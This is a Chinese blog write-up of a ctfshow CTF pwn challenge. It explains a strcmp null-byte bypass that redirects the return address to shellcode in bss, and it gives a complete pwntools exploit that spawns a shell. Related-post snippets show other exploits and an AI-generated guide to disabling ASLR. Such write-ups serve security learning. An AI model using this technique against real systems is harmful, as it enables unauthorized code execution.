2021 ctfshow 月饼杯 pwn 容易的胖

最新推荐文章于 2024-11-26 17:26:33 发布

原创最新推荐文章于 2024-11-26 17:26:33 发布 · 286 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

CTF 专栏收录该内容

213 篇文章

订阅专栏

在这里插入图片描述
保护啥也没有。

在这里插入图片描述
看起来似乎是就是一个输入shellcode的过程，但是往哪输入，然后输入进去咋样，题目怎么做，都暂时看不出来，所以需要我们去调试一下。

在这里插入图片描述
可以看出来shellcode被放在了0x804a040，这是一个bss上的地址。

在这里插入图片描述
我们可以看到，当我们通过’\x00’截断来绕过strcmp正常返回的时候，我们会把ebp-8，也就是v3地方的地址弹到ecx，然后控制了它就可以控制我们函数的返回地址，我们只要让它合适的返回到我们的shellcode上就好啦。

exp

from pwn import*

context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']

r = process("yb2")

bss_addr = 0x804a040

payload = p32(bss_addr + 4) + asm(shellcraft.sh())

r.sendlineafter("Input your shellcode\n", payload)
r.sendlineafter("shellcode????\n", "yes\n" + '\x00' * 12 + p32(bss_addr + 4))

r.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

yongbaoii

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

2021 ctfshow 月饼杯 pwn 简单的胖

yongbaoii的博客

09-24

343

显然就是一个简单的栈溢出，但是问题是还是不知道libc。试了半天libc是2.27的，但是2.27的ibc又会有一个栈对齐的问题。调试调试给它对齐就行。有好几处需要栈对齐。 exp from pwn import* context.log_level = "debug" context.terminal = ['tmux', 'splitw', '-h'] r = process("yb1") elf = ELF("./yb1") libc = ELF("./64/libc-2.27.so..

2021 ctfshow 月饼杯 pwn Moon_note

yongbaoii的博客

09-24

358

保护全开，没给libc。没给libc真可谓。菜单 create 设计的很有意思，申请的chunk实现了类似unsorted bin 的一个hash表。 chunk的结构是前16个字节是title，中间16个字节是链表，后八个字节是一会write的时候写内容的chunk地址。 write 就是申请一个chunk，写东西，地址放到上面create里面说的那个玩意里面。但是只能写一次。 show 正常show delete free掉chunk，但是漏洞就在free掉那个wirte的chunk之后没有清.

2 条评论您还未登录，请先登录后发表或查看评论

ctfshow-月饼杯

LYJ20010728的博客

06-15

728

web1_此夜圆web1_此夜圆考点思路Payloadweb2_故人心考点思路Payloadweb3_莫负婵娟考点思路Payload web1_此夜圆考点 php反序列化字符逃逸思路观察 index.php 代码，很容易发现是php反序列化字符逃逸中字符增多的考点，我们要将password的值变为yu22x，从而达到包含 flag.php 的目的，我们需要逃逸的部分为 ";s:8:"password";s:5:"yu22x";}，长度为30，所以我们需要15个 Firebasky来达到逃逸这部分

ctfshow web 月饼杯

m0_62422842的博客

06-10

624

刷题知识总结：php反序列化字符逃逸。php浮点数绕过。hash爆破。file_get_contents读取任意文件。like盲注，脚本编写。通过环境变量截取字符。

PWN-PRACTICE-CTFSHOW-8

P1umH0的博客

01-18

2021

PWN-PRACTICE-CTFSHOW-8吃瓜杯-wuqian月饼杯II-简单的胖月饼杯II-容易的胖击剑杯-pwn01-My_sword_is_ready 吃瓜杯-wuqian 栈溢出，ret2text # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28059) elf=ELF("./pwn1") sy

ctfshow pwn wp

Chandra的学习之路

11-26

1026

mov eax,[esi]：将esi中的值作为地址（080490E8地址单元中的值，eax只能读取4个字节的内容，读取一个字符Ascii码即1个字节），然后将该地址单元的值赋给eax，我们在ida可以查看080490E8地址单元的值（Welc倒序的ascii码）。根据题目要求，直接查看寄存器寻址方式的内容，可以得到edx的值为0x36d，根据之前某题大写提示，改成0x36D，即：ctfshow{0x36D}mov esi,msg：将msg的地址赋给esi，此时esi寄存器中的值为080490E8；

ctfshow | 单身杯dsb | pwn | ctfshow_OA

Dem1的博客

05-22

523

#create user&password -> login -> validate psn session -> from pwn import * p = remote("pwn.challenge.ctf.show",28156) #-----main -> menu #-----from main #-----create_new_user p.sendline('1') p.recvuntil('username :') p.sendline('pwn')#

CTFSHOW-PWN入门-栈溢出（35-42）

2402_84585385的博客

10-09

1027

发现hint函数中存在system函数，useful函数存在sh，根据题目的提示得知或许sh可以替代bin/sh，找到sh的地址为0x80487BA。发现hint函数中存在system函数，useful函数存在sh，根据题目的提示得知或许sh可以替代bin/sh，找到sh的地址为0x400872。ctfshow函数中的，v1大小为14，而read函数读取大小为50，所以read函数存在栈溢出，使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出，cyclic计算栈偏移量为18。

PWN入门（2）利用缓冲区溢出绕过登录和第一个PwnTools脚本

Ba1_Ma0的博客

09-08

1616

有什么不会或者是错误的地方的可以私信我，看到必回。

学校的简单入门题PWN

EternalBurning的博客

11-09

641

学校的简单入门题PWN0x00 first try0x01 easy_second_try0x02 printf 0x00 first try exeinfo打开看一下，是32位的看看有没有程序保护，估计是入门题的缘故都没有程序保护：用32位的ida打开，要想拿到shell，就得让v6==99，而第11行的read（）明显存在栈溢出，双击变量进入函数的栈界面容易发现，s字符串的长度...

PWN-PRACTICE-CTFSHOW-6

P1umH0的博客

01-18

1922

PWN-PRACTICE-CTFSHOW-636D杯-MengxinStack36D杯-tang1024杯-1024_happy_stack1024杯-1024_happy_checkin 36D杯-MengxinStack 程序开了canary和PIE保护泄露远程libc版本，为 libc6_2.23-0ubuntu10_amd64.so from pwn import * io=remote("pwn.challenge.ctf.show",28124) io.recvuntil("She said:

BUUCTF PWN OGeek2019 babyrop

Rt1Text的博客

05-01

445

1.checksec+运行 32位/ NX保护开启/ 还有Full RELRO 2.IDA进行中

ctfshow-月饼杯WP

~airrudder~

09-27

5086

源码文件Baby(Don't)Cry.py： # -*- coding:utf-8 -*- #Author: Lazzaro from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return

津门杯pwn

清霂的博客

05-13

405

目录hello 嘿嘿,单独发纪念一下，首次在国内比赛做出一道pwn题(23/59) hello #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "hello" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) free_got=elf.got

2021年津门杯ctf线上赛记录（WICCTF）

lifanxin的博客

05-12

2159

津门杯ctf线上赛概述pwn题easypwnpwnCTFM总结概述本篇博客记录下自己的第一次ctf比赛经历，其实不完全是第一次，之前也参加过其他比赛，但只能做个签到就走了，这次不一样了，好歹做出了一道pwn题，有一道本来是有机会的，搞错libc了，线上没拿到flag，不过线上复现了下，感觉还行。因此特写下此篇博文，记录自己的一血。???? pwn题我个人现在只会做做pwn题，后面打算也看看web，提升一下综合实力，这里介绍下比赛中的两道pwn题，和官方wp不一样，这里是我自己的思路。 easy

CTFSHOW 36D杯CTF（pwn部分wp）

weixin_44296844的博客

05-04

2050

PWN WP 感谢1p0ch师傅最近参加了ctf.show举办的一个比赛，做了一下pwn题，以下是我的一些wp，由于本人能力有限，菜的一批，如果有什么不对的地方，请多包含。 PWN_签到签到题直接nc上去以后发现考察的是linux的基本操作，程序过滤掉了空格，cat，但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...

one_gadget 下载安装与使用

yongbaoii的博客

10-15

9786

00 开始当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的，专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用举个栗子还是挺简单的。 ...

go pwn 2022 虎符 gogogo

yongbaoii的博客

04-09

7247

刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。

解决LibcSearcher找不到合适libc（更新libc）

yongbaoii的博客

02-09

6970

1 尝试直接更新进入LibcSearcher/libc-database中运行./get文件即可进行更新。可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。那么就看需要点啥更新点啥，一般是 ./get ubuntu #一般pwn题环境就Ubuntu，所以有第一个

ctfshow提供的pwn的linux环境

最新发布

03-26

<think>好的，我现在需要帮助用户解决关于CTFShow平台上PWN相关的Linux环境配置和使用方法的问题。首先，我需要确认用户的具体需求是什么。他们可能是在准备CTF比赛，需要配置一个适合PWN挑战的Linux环境，可能涉及到调试工具、禁用地址随机化（ASLR）、内核设置等方面。根据用户提供的引用内容，有三个引用提到了修改ASLR的方法，以及关闭内核地址随机化（nokaslr）的启动参数。还有安装内核符号表的步骤。这些都是配置PWN环境时的常见操作。因此，我需要将这些信息整理成清晰的步骤，并确保用户能够按照步骤操作。首先，用户可能需要安装基本的开发工具，比如gcc、gdb、make等，这些都是编译和调试PWN题目的基础。接下来是禁用ASLR，这在PWN题目中很常见，因为地址随机化会增加利用难度，禁用后可以更稳定地进行漏洞利用。用户提供的引用[1]和[2]都提到了通过修改/proc/sys/kernel/randomize_va_space来关闭ASLR，这里需要提醒用户需要root权限，并且可能需要永久设置。然后是配置调试环境，特别是GDB的插件，比如pwndbg、peda或gef，这些工具能极大提高调试效率。用户可能还需要使用checksec来检查二进制文件的保护机制，这可以通过安装pwntools来获得。接下来，用户的问题可能涉及到内核地址随机化（KASLR），这在引用[3]中提到了在启动QEMU时添加nokaslr参数来关闭。这里需要说明如何在启动脚本中设置这个参数，以及可能需要重新编译内核或使用特定启动选项的情况。此外，用户可能需要配置QEMU环境，特别是在使用虚拟机进行漏洞利用时，需要正确设置内核镜像和初始文件系统，如引用[3]中的例子。同时，安装内核符号表对于调试内核相关的题目可能很重要，需要指导用户如何手动安装。最后，用户可能需要安装一些常用的PWN工具，如pwntools、ROPgadget等，这些都是进行漏洞利用的必备工具。在整理这些步骤时，需要确保每个步骤都清晰，并且指出可能的注意事项，比如权限问题或依赖安装。生成的相关问题需要覆盖用户可能遇到的后续疑问，比如如何验证ASLR是否关闭，如何调试内核驱动，如何处理依赖缺失，以及如何优化调试体验等。这些问题可以帮助用户进一步解决实际配置中可能遇到的问题。现在需要将上述思考整理成一个结构化的回答，确保每个步骤都有对应的说明和引用来源。同时，保持语言简洁明了，适合中文用户理解。可能还需要检查是否有遗漏的配置步骤，比如Docker环境的使用或其他特定于CTFShow平台的设置，但根据现有引用内容，可能不需要涉及这些。如果有不确定的地方，可能需要提示用户参考更多资料或官方文档。</think>### CTFShow PWN Linux环境配置指南 #### 1. 基础环境准备 - **安装开发工具**：使用apt安装编译调试工具链 ```bash sudo apt update && sudo apt install -y gcc gdb make python3-pip ``` - **配置ASLR关闭**（关键配置）： ```bash echo 0 > /proc/sys/kernel/randomize_va_space # 临时关闭[^1][^2] # 永久关闭需在/etc/sysctl.conf添加： # kernel.randomize_va_space = 0 ``` #### 2. 调试环境配置 - **安装GDB插件**（推荐pwndbg）： ```bash git clone https://github.com/pwndbg/pwndbg cd pwndbg && ./setup.sh ``` - **安装pwntools工具包**： ```bash pip3 install pwntools ``` #### 3. 内核环境配置（针对内核题目） - **关闭KASLR**：在QEMU启动参数添加`nokaslr`标志 ```bash -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 nokaslr"[^3] ``` - **内核符号表安装**： ```bash gdb -ex "add-symbol-file /path/to/vmlinux" -ex "target remote :1234" ``` #### 4. 工具链配置 - **安装ROPgadget**： ```bash pip3 install ROPgadget ``` - **配置checksec**（已包含在pwntools中）： ```bash checksec --file=target_bin ```